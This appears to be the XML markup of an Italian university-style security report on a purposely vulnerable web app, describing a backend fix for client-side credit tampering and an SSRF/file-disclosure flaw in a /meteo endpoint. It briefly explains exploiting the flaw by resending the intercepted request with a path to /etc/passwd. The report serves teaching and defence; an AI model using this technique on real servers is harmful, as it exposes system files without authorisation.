                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4740275" cy="376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1BC1" w14:textId="54936115" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5A7C5211" w14:textId="3EE6AB8B" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3BB07276" w14:textId="0FD4B0E9" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>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52201E3D" w:rsidR="00D03FA6" w:rsidRDefault="00F5273B" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251867136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="397D8562" wp14:editId="3534ECEB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5212715" cy="635"/>
                <wp:effectExtent l="0" t="0" r="6985" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="828727142" name="Casella di tes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6C4F12B2" w14:textId="14F9C242"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8</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Invio dell'oggetto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8562" id="_x0000_s1085" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:.55pt;width:410.4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KGwIAAEA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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6C4F12B2" w14:textId="14F9C242"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>58</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Invio dell'oggetto malevolo</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F96853" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A8CA70D" w14:textId="77777777" w:rsidR="0077061B" w:rsidRPr="0077061B" w:rsidRDefault="00987816" w:rsidP="00467BBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077061B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769680B9" w14:textId="2E36F7AC" w:rsidR="0077061B" w:rsidRPr="0077061B" w:rsidRDefault="0077061B" w:rsidP="0077061B">
      <w:r>
        <w:t>Per il fix abbiamo spostato la logica di incremento del credito sul backend in modo da evitare la serializzazione da parte del frontend</w:t>
      </w:r>
      <w:r w:rsidR="00F5273B">
        <w:t xml:space="preserve"> (Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidR="00F5273B">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per fare ciò è stato usato un task periodico che ogni 30 secondi incrementa il credito, bloccando la possibilità che l’utente possa modificare l’oggetto serializzato e reinviarlo al server. In particolare, quando un utente fa il login, viene richiamata la funzione </w:t>
      </w:r>
      <w:r w:rsidRPr="0077061B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>startCreditUpdateTask()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nel backend, mentre quando l’utente fa il logout tale funzione viene stoppata usando </w:t>
      </w:r>
      <w:r w:rsidRPr="0077061B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stopCreditUpdateTask()</w:t>
      </w:r>
      <w:r w:rsidR="00F5273B">
        <w:t xml:space="preserve">, visibili in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>61</w:t>
      </w:r>
      <w:r w:rsidR="00F5273B">
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00A62E0F">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Nel frontend invece viene gestito il logout nell’API / nel file </w:t>
      </w:r>
      <w:r w:rsidRPr="0077061B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Home.jsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> come in Figura 5</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F290FCC" w14:textId="6944FBD0" w:rsidR="0077061B" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251984896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F1E5B41" wp14:editId="167D4F61">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3743165" cy="1821827"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="1004593448"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3165" cy="1821827"/>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1232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E7FF968" wp14:editId="26BBFFC1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1459865</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1883410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3199765" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="305077976" name="Casella di testo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4E9BA8" w14:textId="3E790C02"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>59</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Home.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F968" id="_x0000_s1086" type="#_x0000_t202" style="position:absolute;margin-left:114.95pt;margin-top:148.3pt;width:251.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t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e3tx/kNZ5Ji8+ub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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7F4E9BA8" w14:textId="3E790C02"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>59</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Home.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4C2539" w14:textId="13ECD2E2" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38183F2D" w14:textId="00FF797E" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4CAD8DD7" w14:textId="41612B81" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="77FAE3A6" w14:textId="77777777" w:rsidR="00F5273B" w:rsidRDefault="00F5273B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="35FF7A3B" w14:textId="32E959B1" w:rsidR="004E3997" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251985920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6629D801" wp14:editId="3D229E5D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-690880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3990975" cy="3052371"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="64465459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0975" cy="3052371"/>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3280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6692215D" wp14:editId="1BCAA96A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1188720</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2444115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3742690" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="812993503" name="Casella di testo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C4E9B73" w14:textId="13E22A64"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>60</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: AccountUs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215D" id="_x0000_s1087" type="#_x0000_t202" style="position:absolute;margin-left:93.6pt;margin-top:192.45pt;width:294.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l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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5C4E9B73" w14:textId="13E22A64"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>60</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: AccountUser.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="309FE05B" w14:textId="6DBD35AF" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="45B7BFB3" w14:textId="740D0798" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3FFAA541" w14:textId="77777777" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="39F02104" w14:textId="77777777" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="64C26CFD" w14:textId="50600FB8" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4195C769" w14:textId="77777777" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="316BE472" w14:textId="1FBA49E9" w:rsidR="00F5273B" w:rsidRDefault="00F5273B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7674DD8D" w14:textId="286E44EC" w:rsidR="00F5273B" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251986944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E75D520" wp14:editId="19CA458E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>248285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6317889" cy="5848316"/>
            <wp:effectExtent l="0" t="0" r="6985" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="394932464"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7889" cy="5848316"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC739BD" w14:textId="4779D85D" w:rsidR="0077061B" w:rsidRDefault="00F5273B" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251875328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A5FECE0" wp14:editId="14367B41">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>193040</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5861685</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5732145" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="701814022" name="Casella di testo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BF4D77D" w14:textId="4282188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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>61</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FECE0" id="_x0000_s1088" type="#_x0000_t202" style="position:absolute;margin-left:15.2pt;margin-top:461.55pt;width:45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8C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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3BF4D77D" w14:textId="4282188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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>61</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4307153A" w14:textId="06585774" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2A615D63" w14:textId="7135BDAD" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="36EF62CE" w14:textId="17437FC9" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="74306243" w14:textId="28BEE39B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6EAF361A" w14:textId="51766AF1" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D2F5AA3" w14:textId="40EF1ADF" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A3E4C4E" w14:textId="7A968024" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3750DD8F" w14:textId="16BF90BA" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="11F7A53F" w14:textId="25EA8B1B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49884262" w14:textId="6A9B0839" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1F2A00B4" w14:textId="0483DEF0" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5B15D8E6" w14:textId="25A7CBBA" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4FA025F7" w14:textId="4ED0707D" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5F44B18B" w14:textId="1B7F78A8" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0BD6A09D" w14:textId="51C04B42" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7597DBA2" w14:textId="4D14D395" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="53982514" w14:textId="77777777" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5DC2BD77" w14:textId="77777777" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6DDA2B74" w14:textId="6E7A9CDE" w:rsidR="0077061B" w:rsidRDefault="0077061B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5BCC208B" w14:textId="4115A2D9" w:rsidR="0077061B" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251987968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B9F2FB9" wp14:editId="4874D3D1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-358775</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6939265" cy="1152300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="186554246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39265" cy="1152300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F5273B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251877376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="247F2C48" wp14:editId="72DAA48E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-504190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>866140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7127875" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="893672790" name="Casella di testo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F9F724A" w14:textId="6116E549"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>6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2C48" id="_x0000_s1089" type="#_x0000_t202" style="position:absolute;margin-left:-39.7pt;margin-top:68.2pt;width:56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9CGgIAAEA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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4F9F724A" w14:textId="6116E549"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>62</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6410FD" w14:textId="067A5A54" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0823C77A" w14:textId="186F1CD8" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="589C3028" w14:textId="71126E1E" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6F6B724D" w14:textId="796E364E" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="72A7439C" w14:textId="7E2411AF" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2C60141F" w14:textId="6BC15E81" w:rsidR="00E464AA" w:rsidRPr="00F5273B" w:rsidRDefault="00FD7204" w:rsidP="00F5273B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7204">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>URlConnection Server-Side Request forgery (SSRF) and File Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB68D0C" w14:textId="438ED0B1" w:rsidR="00F5273B" w:rsidRDefault="00F5273B" w:rsidP="00467BBC">
      <w:r w:rsidRPr="00F5273B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>: Meteo.js, HomeController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD53E75" w14:textId="017E6750" w:rsidR="00F5273B" w:rsidRDefault="00F5273B" w:rsidP="00467BBC">
      <w:r w:rsidRPr="00F5273B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>:76 di HomeController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E127AD" w14:textId="5E51A868"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17A6C7FC" w14:textId="3D278DBE" w:rsidR="00F5273B" w:rsidRDefault="00AD3339" w:rsidP="00467BBC">
      <w:r>
        <w:t>In questo esempio è</w:t>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t xml:space="preserve"> stat</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t xml:space="preserve"> aggiunta la possibilità di aprire un </w:t>
      </w:r>
      <w:r w:rsidR="005E7293" w:rsidRPr="00F5273B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>url esterno</w:t>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t xml:space="preserve"> (meteo) di openWeatherMap </w:t>
      </w:r>
      <w:r w:rsidR="00F5273B">
        <w:t>che permette di mostrare sul sito le informazioni del meteo</w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t xml:space="preserve"> (Figura 6</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t xml:space="preserve">Lato frontend è stato creato il file </w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0" w:rsidRPr="00CE3AE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meteo.js</w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t xml:space="preserve"> per la gestione, visibile in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00A62E0F">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t xml:space="preserve"> mentre lato backend è stata aggiunta l’API </w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0" w:rsidRPr="00CE3AE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/meteo</w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0" w:rsidRPr="00CE3AE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HomeController.java</w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t xml:space="preserve"> (Figura </w:t>
      </w:r>
      <w:r w:rsidR="00A62E0F">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidR="00F5273B" w:rsidRPr="00F5273B">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>In particolare</w:t>
      </w:r>
      <w:r w:rsidR="00F5273B">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F5273B" w:rsidRPr="00F5273B">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> viene aperta una connessione all'URL fornito tramite il payload dell'utente senza alcun controllo o validazione. Questo significa che un utente malintenzionato potrebbe fornire un URL che punti a risorse interne alla rete o a risorse sensibili sul web, causando il server a fare richieste non autorizzate a tali risorse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01740302" w14:textId="204D792B" w:rsidR="00AD3339" w:rsidRDefault="00F5273B" w:rsidP="00467BBC">
      <w:r w:rsidRPr="00F5273B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5259B4" w14:textId="04CE571C" w:rsidR="00F5273B" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251988992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61F8170B" wp14:editId="0A5696BF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>939800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6621293" cy="2513082"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:wrapNone/>
            <wp:docPr id="487752400"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1293" cy="2513082"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t xml:space="preserve">Bisogna posizionarsi nella home dell’utente, intercettare la POST </w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0" w:rsidRPr="00CE3AE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/meteo</w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t xml:space="preserve"> dal web developer tool e, tramite Edit e Resend, inviare l’url malevolo al posto di quello del meteo. Nel nostro caso è stato usato il path /etc/passwd per accedere ai contenuti sensibili del backend, come in Figura 6</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D7D74" w14:textId="75D7B73D" w:rsidR="00E464AA" w:rsidRDefault="00CE3AE0" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
